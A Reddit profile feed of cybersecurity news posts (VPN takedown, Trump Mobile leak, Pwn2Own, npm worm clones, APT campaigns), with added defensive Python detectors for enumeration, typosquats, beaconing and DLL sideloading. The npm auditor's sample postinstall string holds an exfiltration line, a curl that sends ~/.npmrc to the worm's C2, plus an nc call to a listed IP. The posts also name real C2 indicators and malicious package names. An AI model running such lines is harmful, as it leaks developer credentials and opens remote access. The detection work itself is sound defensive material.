u/technadu

Europol Dismantles "First VPN" (1vpns) - Infiltrated Database Exposes Thousands of Users
▲ 6 r/VPN

In a major international law enforcement sting coordinated by Europol and Eurojust, authorities have officially seized and dismantled "First VPN" (operating via 1vpns.com, .net, .org, and various Tor onion domains).

The service was a staple of the underground economy, aggressively marketed on Russian-speaking cybercrime forums as a "bulletproof" gateway designed specifically to help ransomware gangs and initial access brokers evade tracking.

The Reality of "Bulletproof" No-Logs Claims: The most critical takeaway for the privacy community is how the takedown was handled. Despite advertising total anonymity and hidden architecture, the VPN's infrastructure was completely compromised from within:

  • The Honeypot Phase: Joint investigators from France and the Netherlands secretly gained access to the VPN's infrastructure back in December 2021.
  • Database Seizure: Law enforcement successfully obtained the service's complete user database and monitored live connections before pulling the plug. CyberInsider
  • Direct Notifications: Every single user connecting to the service has been logged, identified, and sent a direct notification on the seized domains informing them that their real IP addresses and telemetry are now in the hands of global intelligence agencies. www.eurojust.europa.eu

The Takedown Metrics:

  • 33 servers decommissioned across Europe. www.eurojust.europa.eu
  • The primary administrator's residence was raided and searched in Ukraine. www.eurojust.europa.eu
  • 83 discrete intelligence packages containing clear traffic data for 506 high-value users have already been distributed to active international investigations. BeveiligingNieuws

This serves as another stark reminder to the community: if a VPN service markets itself strictly on its ability to evade the law, it is a primary target for a multi-year infiltration, and its "no-logs" architecture will mean nothing once the hypervisor or infrastructure is seized.

Source: https://www.europol.europa.eu/media-press/newsroom/news/cybercriminal-vpn-used-ransomware-actors-dismantled-in-global-crackdown

u/technadu — 14 hours ago
▲ 223 r/pwnhub

Web Vulnerability in Trump Mobile Site Leaks Customer Database and Exposes Order Volume

Shortly after announcing that its delayed, gold-plated T1 smartphone would finally begin shipping, TrumpMobile.com was found to be suffering from a critical web security exploit. A security researcher discovered a flaw that allowed anyone to scrape the company's complete preorder database and submit arbitrary fake orders.

The Flaw & Data Exposure:

The vulnerability resided within the site’s backend infrastructure (specifically targeting order processing endpoints). Unauthenticated requests allowed the researcher to dump cleartext customer records, exposing:

  • Full Names
  • Physical/Mailing Addresses
  • Primary Email Addresses
  • Unique Order Identifiers

High-profile buyers who purchased the $499 phone out of curiosity - including YouTubers Coffeezilla and penguinz0 - were contacted directly by the researcher and confirmed the accuracy of their exposed personal data. No credit card information or payment data appears to have been caught in the leak.

The Operational Leak (The Real Data):

Beyond the privacy implications, the database dump inadvertently exposed the company's actual sales volume. While initial viral marketing metrics claimed roughly 590,000 reservation deposits, the database sequence numbers and unique identifiers indicate the platform only has approximately 10,000 unique customers with roughly 30,000 total smartphone orders.

Supply Chain Context:

The hardware itself is facing intense regulatory scrutiny. Initially marketed with a "Made in the USA" pledge, the branding was quietly altered to "designed with American values." Senator Mark Warner (Senate Intelligence Committee) recently issued an official inquiry demanding full transparency regarding the phone's true OEM suppliers, motherboard origins, and potential Chinese component sourcing.

The security flaw on the preorder site was reportedly patched on May 20, 2026, following zero-response to initial administrative disclosure attempts.

Full Technical Details & Coverage Timeline:

https://www.technadu.com/trump-mobile-reportedly-leaks-customer-data-from-t1-smartphone-orders/628185/
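Added example (mine, not from the post or the TechNadu article): the post describes order endpoints that answered unauthenticated requests for record after record, which is what let one client walk the whole preorder table and read the volume off the sequence numbers. The real fix is a per-order ownership check plus non-guessable identifiers; the compensating detection below flags a client that requests a long run of consecutive order IDs. The log format, the /api/orders/<id> path, the IDs and the thresholds are all assumptions, and the log lines are constructed, not real traffic.

```python
import re
from collections import defaultdict

# Constructed sample access log in combined-log style. Not real Trump Mobile traffic;
# the /api/orders/<id> path and the order IDs are assumptions made for this example.
SAMPLE_LOG = """\
203.0.113.7 - - [20/May/2026:10:00:01 +0000] "GET /api/orders/10001 HTTP/1.1" 200 512
203.0.113.7 - - [20/May/2026:10:00:01 +0000] "GET /api/orders/10002 HTTP/1.1" 200 509
203.0.113.7 - - [20/May/2026:10:00:02 +0000] "GET /api/orders/10003 HTTP/1.1" 200 517
203.0.113.7 - - [20/May/2026:10:00:02 +0000] "GET /api/orders/10004 HTTP/1.1" 404 0
203.0.113.7 - - [20/May/2026:10:00:03 +0000] "GET /api/orders/10005 HTTP/1.1" 200 520
203.0.113.7 - - [20/May/2026:10:00:03 +0000] "GET /api/orders/10006 HTTP/1.1" 200 511
198.51.100.20 - - [20/May/2026:10:00:05 +0000] "GET /api/orders/28811 HTTP/1.1" 200 514
198.51.100.20 - - [20/May/2026:10:02:41 +0000] "GET /api/orders/28811 HTTP/1.1" 200 514
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
ORDER_RE = re.compile(r"^/api/orders/(?P<id>\d+)$")


def parse(log_text):
    """Yield (client_ip, order_id, status) for every request that hit the order endpoint."""
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        o = ORDER_RE.match(m["path"])
        if o:
            yield m["ip"], int(o["id"]), int(m["status"])


def find_enumerators(log_text, min_run=5, distinct_threshold=5):
    """Flag clients that touch many distinct order IDs AND walk them in +1 steps.

    A real customer re-reads their own order (one distinct ID); a scraper walks the
    key space. Returns {ip: {"distinct", "longest_ascending_run", "not_found"}}.
    The 404 count is a second tell: a scraper hits gaps in the sequence, a real user does not.
    """
    per_ip = defaultdict(list)
    for ip, oid, status in parse(log_text):
        per_ip[ip].append((oid, status))

    findings = {}
    for ip, reqs in per_ip.items():
        ids = [oid for oid, _ in reqs]
        distinct = len(set(ids))
        longest = run = 1
        for prev, cur in zip(ids, ids[1:]):
            run = run + 1 if cur == prev + 1 else 1
            longest = max(longest, run)
        not_found = sum(1 for _, st in reqs if st == 404)
        if distinct >= distinct_threshold and longest >= min_run:
            findings[ip] = {
                "distinct": distinct,
                "longest_ascending_run": longest,
                "not_found": not_found,
            }
    return findings


if __name__ == "__main__":
    for ip, f in find_enumerators(SAMPLE_LOG).items():
        print(f"{ip}: walked {f['distinct']} order IDs, "
              f"longest +1 run {f['longest_ascending_run']}, 404s {f['not_found']}")
```

On the sample, 203.0.113.7 is flagged (six consecutive IDs, one 404 on a gap) and 198.51.100.20, which fetched a single order twice, is not. Rate limiting alone would not have caught a slow walk; the ascending-run signal does.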

u/technadu — 18 hours ago
▲ 3 r/pwnhub

Pwn2Own Berlin 2026 Wrap-Up: $1.29M Awarded for 47 Zero-Days; DEVCORE Crushes Microsoft & AI

Pwn2Own Berlin 2026 (hosted at OffensiveCon) has officially wrapped up, and the numbers are wild: $1,298,250 paid out across 47 unique zero-days.

While core OS environments like Windows 11 and RHEL took their usual beatings, this year's distinct focus was on enterprise architecture and, for the first time, AI developer infrastructure.

Here is how the top players carved up the schedule:

1. DEVCORE's Clean Sweep (Master of Pwn)

DEVCORE dominated the scoreboard, walking away with $505,000 and 50.5 points. The undisputed MVP was Orange Tsai, who executed two of the highest-value chains of the entire event:

  • Microsoft Exchange RCE: Chained 3 zero-days to achieve unauthenticated Remote Code Execution as SYSTEM, netting a $200,000 bounty.
  • Microsoft Edge Sandbox Escape: Chained 4 complex logic bugs to break out of the browser sandbox entirely, scoring $175,000.
  • Microsoft SharePoint: Team member splitline closed out Day 3 by chaining 2 bugs to completely exploit SharePoint for $100,000.

2. Virtualization & Infrastructure Heavy Hitters

  • VMware ESXi: STARLabs SG (Nguyen Hoang Thach) hit ESXi using a nasty memory corruption bug combined with a cross-tenant code execution add-on, claiming a maximum $200,000 single payout.
  • NVIDIA Container Toolkit: Valentina Palmiotti (chompie) of IBM X-Force secured $70,000 on Day 1 by dropping a zero-day chain that successfully rooted Red Hat Linux and popped the NVIDIA container layer.

3. The New Meta: Shattering AI Coding Agents

"Vibe coding" security took a massive reality check. AI developer platforms and coding assistants were systematically picked apart:

  • OpenAI Codex: Successfully exploited three separate times across the event by three different teams (Viettel, Compass Security, and Ikotas Labs), completely exposing a broad attack surface in AI execution sandboxes.
  • Anthropic Claude Code & Cursor: Both fell to code-injection and external control bypasses, proving that local AI integrations are becoming a massive, highly targetable Initial Access vector for enterprises.

What happens next?

The clock is ticking. Vendors now have exactly 90 days to push security patches to the public before Trend Micro's Zero Day Initiative (ZDI) drops the full, unredacted technical write-ups and PoCs.

Full Standings, Bounties, and Vulnerability Targets List:
https://www.bleepingcomputer.com/news/security/hackers-earn-1-298-250-for-47-zero-days-at-pwn2own-berlin-2026/

u/technadu — 3 days ago
▲ 4 r/pwnhub

Operation Ramz: INTERPOL Dismantles MENA PhaaS Platforms and Seizes 50+ C2 Servers

INTERPOL has released the final results of Operation Ramz, a coordinated 13-nation takedown targeting transnational cybercrime infrastructure across the Middle East and North Africa (MENA). Running from late 2025 through February 28, 2026, the operation resulted in 201 arrests and the decommissioning of 53 malicious servers.

The Technical Takedowns: The operation focused heavily on neutralizing Initial Access Broker (IAB) pathways and active phishing infrastructure:

  • PhaaS Platform Defeated (Algeria): Authorities successfully dismantled a localized Phishing-as-a-Service (PhaaS) network, seizing the primary deployment server, underlying phishing scripts, and development hard drives.
  • Endpoint Hijack Rings Neutralized (Qatar): Investigators mapped and secured a cluster of compromised enterprise endpoints that threat actors were utilizing as stealth vectors/proxies for outbound threat propagation.
  • Banking Exfil Kits Seized (Morocco): Raids netted hardware containing active phishing development software alongside harvested banking databases and exfiltrated credential caches.
  • Vulnerable Server Disruption (Oman): A private server storing sensitive data that had been backdoored and actively abused as a malware distribution point was completely decommissioned.

Private Sector Intel Synergy: The infrastructure tracking was heavily accelerated by telemetry and threat intelligence packages provided by private cybersecurity firms, including Group-IB, Kaspersky, the Shadowserver Foundation, and Team Cymru.

Human Trafficking/Scam Nexus: Similar to operations in Southeast Asia, the raid in Jordan highlighted the growing dark sector trend of cyber-slavery. Authorities freed 15 Asian nationals who had been trafficked under false job promises, had their passports confiscated, and were being forced to operate financial fraud infrastructure.

Full Technical Breakdown & Regional Impact Analysis: https://www.technadu.com/interpols-operation-ramz-disruption-of-transnational-cybercrime-networks-over-200-individuals-arrested/627967/

u/technadu — 3 days ago
▲ 18 r/pwnhub

The Shai-Hulud Worm Goes Open-Source: Copycats Weaponize Typosquatted npm Packages

Last week, the TeamPCP threat group shocked the security community by dumping the full source code of their Shai-Hulud worm onto GitHub—even offering a $1,000 "bounty competition" on BreachForums for the biggest supply chain hack. The fallout is already here.

Researchers at Ox Security have caught the first wave of copycat packages hitting the npm registry, racking up over 2,600 downloads via aggressive typosquatting.

The "Devouring" Self-Propagation Mechanics: Named after the Dune sandworms, Shai-Hulud is highly dangerous because it targets developer environments and CI/CD pipelines to self-propagate:

  1. It infects a developer's workstation via typosquatted dependencies.
  2. It harvests npm tokens, GitHub personal access tokens (PATs), AWS keys, and Kubernetes secrets.
  3. It uses the stolen credentials to automatically inject its payload into the victim’s legitimate repositories, publishing tainted updates on their behalf to infect downstream targets.

The First Discovered Clones:

A threat actor using the handle deadcode09284814 pushed four un-obfuscated packages, utilizing the leaked source code with customized C2 servers:

  • chalk-tempalte: A direct, un-obfuscated clone of the Shai-Hulud worm. Drops stolen credentials to a new public GitHub repo titled "A Mini Sha1-Hulud has Appeared" and a C2 at 87e0bbc636999b[.]lhr[.]life.
  • axois-utils: Deviates from the worm structure to deploy a Go-based DDoS botnet called Phantom Bot (establishing persistence via Windows Startup and scheduled tasks).
  • deadcode09284814/axios-util & color-style-utils: Standard infostealers grabbing cloud environment variables.

Defensive Actions & Blue Team IoCs:

If you run a JS shop, check your environment for:

  • Outbound hits to 87e0bbc636999b[.]lhr[.]life or 80[.]200[.]28[.]28:2222.
  • Malicious hooks or file creations within IDEs or Coding Agents (like Claude Code configuration states).
  • Audit for any repository initialization patterns matching the "Mini Sha1-Hulud" exfil pattern.

Full Technical Analysis & Complete Hash List: https://www.technadu.com/first-shai-hulud-worm-clones-emerge-in-npm-supply-chain/627948/
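Added example (mine, not code from the post, Ox Security or TeamPCP): a lockfile audit that turns the post's "Defensive Actions" into something you can run in CI. It checks package-lock.json entries against the four clone names, measures edit distance to a few popular names to catch the next typosquat, flags packages that run an install script (the hook a worm needs), and greps any blob (a postinstall body, a netstat dump) for the two C2 indicators. The lockfile and the postinstall text are constructed; the list of popular names is an assumption, and the post's deadcode09284814/axios-util is assumed to be the npm-scoped form @deadcode09284814/axios-util, so a leading @ is stripped before matching.

```python
import json

# Indicators as given in the post (defanged brackets removed).
KNOWN_BAD_PACKAGES = {"chalk-tempalte", "axois-utils", "deadcode09284814/axios-util", "color-style-utils"}
KNOWN_BAD_HOSTS = {"87e0bbc636999b.lhr.life", "80.200.28.28"}
# Names the typosquats imitate. Assumption for this example; use your own allowlist in practice.
POPULAR = ["chalk", "chalk-template", "axios", "lodash", "express", "react", "colors"]

# Constructed package-lock.json (lockfileVersion 3), not a real project's lockfile.
SAMPLE_LOCK = json.dumps({
    "name": "demo-app", "lockfileVersion": 3,
    "packages": {
        "": {"name": "demo-app", "dependencies": {"chalk": "^5.3.0", "axios": "^1.6.0"}},
        "node_modules/chalk": {"version": "5.3.0",
                               "resolved": "https://registry.npmjs.org/chalk/-/chalk-5.3.0.tgz"},
        "node_modules/axios": {"version": "1.6.0",
                               "resolved": "https://registry.npmjs.org/axios/-/axios-1.6.0.tgz"},
        "node_modules/chalk-tempalte": {"version": "1.0.0", "hasInstallScript": True,
                                        "resolved": "https://registry.npmjs.org/chalk-tempalte/-/chalk-tempalte-1.0.0.tgz"},
        "node_modules/@deadcode09284814/axios-util": {"version": "1.0.2",
                                                      "resolved": "https://registry.npmjs.org/@deadcode09284814/axios-util/-/axios-util-1.0.2.tgz"},
    },
})

# Constructed postinstall body, illustrating the kind of text find_iocs() is meant to scan.
SAMPLE_POSTINSTALL = "curl -s https://87e0bbc636999b.lhr.life/ -d @$HOME/.npmrc; nc 80.200.28.28 2222"


def levenshtein(a, b):
    """Plain edit distance (insert/delete/substitute), O(len(a)*len(b))."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def typosquat_candidates(name, max_dist=2):
    """Popular names within max_dist edits of the (unscoped) package name."""
    base = name.split("/")[-1]
    hits = []
    for popular in POPULAR:
        d = levenshtein(base, popular)
        if 0 < d <= max_dist:
            hits.append((popular, d))
    return hits


def find_iocs(text):
    """Known C2 hosts/IPs that appear verbatim in a blob (script, config, netstat output)."""
    return {h for h in KNOWN_BAD_HOSTS if h in text}


def audit_lockfile(lock_text):
    """Return {package_name: [reasons]} for every lockfile entry worth a look."""
    lock = json.loads(lock_text)
    findings = {}
    for key, meta in lock.get("packages", {}).items():
        if key == "":
            continue  # root project entry
        name = key.split("node_modules/")[-1]  # handles nested node_modules paths
        reasons = []
        if name.lstrip("@") in KNOWN_BAD_PACKAGES:
            reasons.append("name matches a published Shai-Hulud clone")
        for target, d in typosquat_candidates(name):
            reasons.append(f"edit distance {d} from '{target}'")
        if meta.get("hasInstallScript"):
            reasons.append("declares an install script (worm execution hook)")
        if reasons:
            findings[name] = reasons
    return findings


if __name__ == "__main__":
    for pkg, why in audit_lockfile(SAMPLE_LOCK).items():
        print(pkg, "->", "; ".join(why))
    print("IoCs in postinstall:", find_iocs(SAMPLE_POSTINSTALL))
```

The install-script flag fires on legitimate native packages too, so treat it as a triage signal to combine with the other two, not a verdict. Run the audit against the lockfile before `npm ci` in the pipeline and fail the build on a known-bad match.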

u/technadu — 4 days ago
▲ 9 r/VPN

The Cost of Silence: How $40 VPNs and Total Blackouts are Ending Women’s Online Work in Iran

The ongoing internet blackout in Iran (the longest on record since February 28) has shifted from a "censorship" issue to a full-blown economic crisis for women. For those who built a "parallel labor market" on Instagram and remote platforms, the internet wasn't just for social media - it was their only source of income.

The VPN Economic Barrier:

  • Unattainable Costs: Local workers, like a Tehran yoga instructor and a rural food seller named Leila, report spending upwards of 5 million tomans (~$40 USD) on VPNs just to maintain a connection. In a tanking economy, this cost is often more than their monthly profit.
  • The Stability Gap: Even expensive VPNs are described as "costly and unstable," making professional work like online teaching or translation nearly impossible to sustain.
  • Gendered Impact: With female labor participation at 18%, the digital space was the primary entry point for women. Experts now describe the current state as "internet apartheid," where only those with state-approved connections or high-tier VPNs can participate in the global economy.

The Numbers: According to Iran's Deputy Labor Minister, the conflict and resulting blackouts have led to roughly 1 million lost jobs, with women in informal and digital sectors being the first to be laid off or lose their customer bases.

Full Report on the Digital Labor Collapse:
https://www.rferl.org/a/iran-internet-blackout-women-brunt-labor-market/33755949.html

u/technadu — 6 days ago
▲ 3 r/pwnhub

APT Analysis: Ghostwriter Targets Ukraine with Geofenced PDF Payloads & PicassoLoader (CVE-2026-0300 Nexus)

The Belarus-aligned APT Ghostwriter (UNC1151/UAC-0057) has launched a new campaign targeting Ukrainian government entities with a highly surgical infection chain. ESET researchers recently documented how the group is using server-side geographic validation to keep their latest tools under the radar.

The "Geofence" Gatekeeper:

The attack starts with a spearphishing PDF impersonating Ukrtelecom. The clever part is in the delivery server:

  • Ukrainian IPs: Receive a weaponized RAR archive containing a JavaScript-based PicassoLoader.
  • Non-Ukrainian IPs: Receive a benign, non-malicious PDF about 2024–2026 telecommunications regulations. This significantly complicates automated sandbox analysis and remote researcher triage.

Technical Chain: PicassoLoader to Cobalt Strike

  1. First-Stage JS: Drops a decoy PDF to keep the user distracted while executing the second-stage downloader.
  2. PicassoLoader (JS Variant): This version fingerprints the host every 10 minutes (OS version, boot time, active PIDs) and waits for a manual "Go" signal from the operator.
  3. Cobalt Strike Beacon: Once the victim is confirmed as high-value, the C2 pushes the final Cobalt Strike beacon (disguised as %ProgramData%\ViberPC.dll) for persistent espionage.

Operational Shift:

Ghostwriter is increasingly moving away from weaponized Excel docs (2025 tactic) toward JavaScript/PDF chains, likely in response to enhanced Microsoft 365 macro protections.

Full Indicators of Compromise (IoCs) and Attack Chain Diagrams:

https://www.technadu.com/suspected-belarusian-state-nexus-actors-target-ukraine-with-new-cobalt-strike-cyberespionage-campaign/627880/
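Added example (mine, not from the post or ESET): the geofence defeats sandboxes that egress from outside Ukraine, so you may never see the payload, but the post gives a network tell you can hunt for anyway: the JS PicassoLoader phones home every 10 minutes while waiting for the operator's "Go". The script below takes proxy log lines, computes inter-arrival times per (source, destination) pair and flags pairs whose intervals are regular and close to a 600-second period. The log lines and hostnames are constructed (.test TLD), not IoCs from the report, and the thresholds are assumptions.

```python
from collections import defaultdict
from datetime import datetime
from statistics import mean, median, pstdev

# Constructed proxy log: "<utc timestamp> <src ip> <dest host> <dest port>".
# cdn-update.example.test stands in for an unknown C2; nothing here is from the ESET IoC list.
SAMPLE_PROXY = """\
2026-05-12T08:00:03Z 10.20.1.15 cdn-update.example.test 443
2026-05-12T08:01:10Z 10.20.1.15 login.microsoftonline.com 443
2026-05-12T08:10:04Z 10.20.1.15 cdn-update.example.test 443
2026-05-12T08:20:02Z 10.20.1.15 cdn-update.example.test 443
2026-05-12T08:27:45Z 10.20.1.15 login.microsoftonline.com 443
2026-05-12T08:30:05Z 10.20.1.15 cdn-update.example.test 443
2026-05-12T08:40:03Z 10.20.1.15 cdn-update.example.test 443
2026-05-12T08:50:04Z 10.20.1.15 cdn-update.example.test 443
2026-05-12T09:00:03Z 10.20.1.15 cdn-update.example.test 443
2026-05-12T09:03:12Z 10.20.1.15 login.microsoftonline.com 443
2026-05-12T09:11:50Z 10.20.1.22 login.microsoftonline.com 443
"""


def parse_proxy(text):
    """Yield (timestamp, src, host, port) per line."""
    for line in text.splitlines():
        ts, src, host, port = line.split()
        yield datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"), src, host, int(port)


def find_beacons(text, min_hits=5, max_cv=0.1, expected_period_s=None, tolerance_s=60):
    """Flag (src, host) pairs whose connection intervals are suspiciously regular.

    cv = stdev/mean of the gaps; human-driven traffic has a high cv, a timer loop a very
    low one. If expected_period_s is given (600 for this loader), the median gap must also
    sit within tolerance_s of it. Returns {(src, host): {"count", "median_interval_s", "cv"}}.
    """
    by_pair = defaultdict(list)
    for ts, src, host, _ in parse_proxy(text):
        by_pair[(src, host)].append(ts)

    hits = {}
    for pair, stamps in by_pair.items():
        if len(stamps) < min_hits:
            continue
        stamps.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
        mu = mean(gaps)
        cv = pstdev(gaps) / mu if mu else float("inf")
        med = median(gaps)
        if cv > max_cv:
            continue
        if expected_period_s is not None and abs(med - expected_period_s) > tolerance_s:
            continue
        hits[pair] = {"count": len(stamps), "median_interval_s": med, "cv": round(cv, 4)}
    return hits


if __name__ == "__main__":
    for (src, host), info in find_beacons(SAMPLE_PROXY, expected_period_s=600).items():
        print(f"{src} -> {host}: {info['count']} hits, "
              f"median {info['median_interval_s']:.0f}s, cv {info['cv']}")
```

On the sample only the 10.20.1.15 to cdn-update.example.test pair fires (seven hits, median 600 s, cv about 0.003); the identity-provider traffic is too few and too irregular. Real loaders add jitter, which is why the check uses a cv bound rather than an exact period, and why a fixed-interval hit on a host with a decoy PDF in the user's Downloads deserves a look at %ProgramData% for the ViberPC.dll drop the post mentions.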

u/technadu — 7 days ago
▲ 45 r/VPN

Russia Official: Total VPN Ban "Impossible" – Would Break National Banks & Tech

Valery Fadeev, head of Russia’s Human Rights Council, has publicly conceded that a total ban on VPNs is technically unachievable and would likely "break" the country's digital economy.

The Technical Reality Check:

  • Infrastructure Dependency: Fadeev admitted that Russia’s banking systems, tech firms, and software developers rely heavily on VPN protocols for secure remote access and cross-system operations. A blanket ban would cause "catastrophic" disruptions to financial services.
  • Complex Ecosystem: Officials now acknowledge that VPN technology is too deeply integrated into the modern internet to be surgically removed without damaging broader connectivity.
  • The "Enemy Propaganda" Stance: Despite the technical surrender, Fadeev continues to frame civilian VPN use for accessing independent media as "enemy propaganda," suggesting that while the tools won't be banned entirely, the government will continue to focus on "reducing" usage through other means.

Why this matters for the VPN industry:

This admission signals a shift from "Total Ban" rhetoric to a "Whitelisting" model, where the government attempts to block consumer VPNs while preserving tunnels for state-loyal businesses - a strategy that has historically proven difficult to enforce via DPI (Deep Packet Inspection).

Source: https://cyberinsider.com/russian-official-admits-vpns-cannot-be-fully-blocked-without-breaking-the-internet/

u/technadu — 8 days ago
▲ 3 r/pwnhub

APT Analysis: MuddyWater (MOIS) Breaches 9 Countries via SentinelOne & Fortemedia DLL Sideloading

A Q1 2026 intelligence report has mapped a sprawling campaign by the Iran-linked APT MuddyWater (Static Kitten), confirming breaches across nine countries - including a major South Korean electronics manufacturer.

The Tradecraft: DLL Sideloading

The group continues to successfully evade EDR by abusing legitimate, signed binaries. In this campaign, they were observed sideloading malicious DLLs via:

  • sentinelmemoryscanner.exe (SentinelOne)
  • fmapp.exe (Fortemedia)

Technical Payloads: The sideloaded DLLs contained ChromElevator, a post-exploitation tool specifically designed to bypass UAC and extract credentials from Chromium-based browsers.

Tactical Shift: Instead of traditional custom backdoors, MuddyWater is moving toward a Node.js runtime environment to execute their PowerShell logic. This handles:

  • Privilege Escalation & SAM Hive Theft
  • SOCKS5 Reverse-Proxy Tunneling
  • Exfiltration via sendit.sh: By using public file-transfer services, they successfully blended exfiltration traffic with standard cloud operations, bypassing many network perimeter alarms.

Impact: The electronics manufacturer was compromised for a full week before detection. This highlights a persistent gap in how legacy behavioral analysis handles "living-off-the-land" (LotL) techniques combined with signed binary abuse.

Full Technical Analysis & IoC Breakdown: https://www.technadu.com/iran-linked-muddywater-group-breached-organizations-in-9-countries-in-q1-2026-including-major-electronics-maker/627875/
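Added example (mine, not from the post or the underlying report): sideloading works because the host process is signed and trusted, so the thing to look at is the image-load event, not the process. The check below runs over Sysmon Event ID 7 (ImageLoaded) records and flags the two binaries the post names when they load an unsigned DLL from their own directory, when the signed binary itself runs from a user-writable path (the usual sign it was copied out of its install location), or when any process loads an unsigned DLL from a user-writable path. The event records are constructed and the DLL file names are placeholders, not the DLLs from the report; the path lists are assumptions.

```python
import ntpath

# Signed binaries named in the Q1 2026 report as sideloading hosts; extend with your own.
SIDELOAD_HOSTS = {"sentinelmemoryscanner.exe", "fmapp.exe"}
# Path fragments that an unprivileged user can normally write to (assumption; tune per estate).
USER_WRITABLE = ("\\users\\", "\\programdata\\", "\\temp\\", "\\downloads\\", "\\public\\")
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\", "c:\\windows\\winsxs\\")

# Constructed Sysmon Event ID 7 records (field names as Sysmon emits them).
# version.dll / FmAppUtil.dll are placeholder names, not the DLLs from the report.
SAMPLE_EVENTS = [
    {"ProcessId": 4120,
     "Image": r"C:\Program Files\SentinelOne\Sentinel Agent\sentinelmemoryscanner.exe",
     "ImageLoaded": r"C:\Windows\System32\kernel32.dll",
     "Signed": "true", "Signature": "Microsoft Windows", "SignatureStatus": "Valid"},
    {"ProcessId": 4120,
     "Image": r"C:\Program Files\SentinelOne\Sentinel Agent\sentinelmemoryscanner.exe",
     "ImageLoaded": r"C:\Program Files\SentinelOne\Sentinel Agent\version.dll",
     "Signed": "false", "Signature": "", "SignatureStatus": "Unavailable"},
    {"ProcessId": 5008,
     "Image": r"C:\Users\jdoe\AppData\Local\Temp\fmapp.exe",
     "ImageLoaded": r"C:\Users\jdoe\AppData\Local\Temp\FmAppUtil.dll",
     "Signed": "false", "Signature": "", "SignatureStatus": "Unavailable"},
    {"ProcessId": 6122,
     "Image": r"C:\Windows\System32\notepad.exe",
     "ImageLoaded": r"C:\Windows\System32\user32.dll",
     "Signed": "true", "Signature": "Microsoft Windows", "SignatureStatus": "Valid"},
]


def _truthy(value):
    return str(value).lower() == "true"  # Sysmon writes "true"/"false" strings


def _dir_of(path):
    return ntpath.dirname(path).lower().rstrip("\\") + "\\"


def is_user_writable(path):
    p = path.lower()
    return any(marker in p for marker in USER_WRITABLE)


def check_image_load(evt):
    """Return the reasons an ImageLoaded event looks like sideloading (empty list = benign)."""
    exe, dll = evt["Image"], evt["ImageLoaded"]
    exe_name = ntpath.basename(exe).lower()
    dll_dir = _dir_of(dll)
    same_dir = dll_dir == _dir_of(exe)
    unsigned = (not _truthy(evt.get("Signed"))) or evt.get("SignatureStatus") != "Valid"
    reasons = []
    if exe_name in SIDELOAD_HOSTS:
        if same_dir and unsigned:
            reasons.append(f"{exe_name} loaded unsigned {ntpath.basename(dll)} from its own directory")
        if is_user_writable(exe):
            reasons.append(f"{exe_name} is running from user-writable path {ntpath.dirname(exe)}")
    if unsigned and is_user_writable(dll) and dll_dir not in SYSTEM_DIRS:
        reasons.append(f"unsigned DLL loaded from user-writable path: {dll}")
    return reasons


def triage(events):
    """Keep only the events with at least one reason, preserving input order."""
    out = []
    for evt in events:
        reasons = check_image_load(evt)
        if reasons:
            out.append({"pid": evt["ProcessId"], "image": evt["Image"],
                        "dll": evt["ImageLoaded"], "reasons": reasons})
    return out


if __name__ == "__main__":
    for hit in triage(SAMPLE_EVENTS):
        print(hit["pid"], hit["dll"])
        for r in hit["reasons"]:
            print("   -", r)
```

Two of the four sample events are flagged: the scanner binary loading an unsigned DLL beside itself inside Program Files (one reason) and fmapp.exe running out of Temp with an unsigned neighbour (three reasons). The second pattern is the higher-confidence one; the first also matches some legitimate vendor plug-ins, so baseline it per product before alerting.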

u/technadu — 8 days ago
▲ 3 r/pwnhub

TeamPCP Claims Mistral AI Breach, the Company Announces Being Impacted by the TanStack Supply Chain Attack

According to the threat actor, the alleged data includes repositories tied to:

  • AI training
  • Fine-tuning
  • Benchmarking
  • Inference systems
  • Future projects and experiments

However, Mistral AI currently says there is no evidence its internal infrastructure was breached.

What the company did confirm is exposure to the broader TanStack supply chain attack, where compromised NPM and PyPI packages reportedly:

  • Harvested developer credentials
  • Targeted Linux environments
  • Deployed malware
  • Attempted secret extraction from developer systems

Mistral advised affected users to:

  • Stop using impacted package versions immediately
  • Rotate all accessible secrets
  • Review cloud audit logs
  • Monitor for suspicious outbound connections to known C2 infrastructure

This case is another reminder that supply chain compromises increasingly target developer environments rather than production systems directly. Compromised developer machines can become a gateway into CI/CD pipelines, repositories, cloud infrastructure, and AI training environments.

Do you think developer ecosystem attacks are now more dangerous than direct infrastructure attacks for AI companies?

Article:
https://www.technadu.com/teampcp-claims-mistral-ai-breach-the-company-announces-being-impacted-by-the-tanstack-supply-chain-attack/627870/

u/technadu — 8 days ago
▲ 3 r/pwnhub

Skoda Auto has disclosed a cybersecurity breach affecting its online retail infrastructure after attackers reportedly exploited a vulnerability in the platform’s software architecture.

According to the disclosure, the attackers may have gained access to customer information including:
  • Names
  • Addresses
  • Email addresses
  • Phone numbers
  • Order information
  • Hashed passwords

Skoda says there’s currently no confirmed evidence of misuse, but it also admitted it cannot fully determine whether data was copied or accessed during the intrusion.

The company reportedly took the affected portal offline, patched the vulnerability, informed regulators, and brought in external forensic specialists.

Interesting detail: payment card processing was handled by external providers, so full credit card data was reportedly not exposed.

The automotive industry has become an increasingly attractive target for attackers because modern carmakers now operate large digital ecosystems involving e-commerce, mobile apps, connected vehicles, customer portals, and supplier infrastructure.

Do you think automotive companies are prepared for the cybersecurity risks tied to connected customer platforms and online commerce?

Article:
https://www.technadu.com/skoda-auto-carmaker-discloses-online-shop-intrusion-potentially-impacting-customer-data/627833/

u/technadu — 9 days ago
▲ 3 r/pwnhub

Researchers warn attackers are abusing Google Ads and Claude.ai shared chats to distribute macOS malware

Researchers uncovered an active malvertising campaign targeting macOS users through sponsored Google Ads and legitimate Claude.ai shared chats.

According to reports:

  • Users searching for “Claude mac download” were redirected through sponsored ads
  • Fake Claude installation guides instructed users to run Terminal commands
  • Malware silently downloaded and executed after command execution
  • Multiple payload variants were identified

One variant reportedly:

  • Harvests browser credentials
  • Steals session cookies
  • Extracts macOS Keychain contents
  • Profiles devices before exfiltration

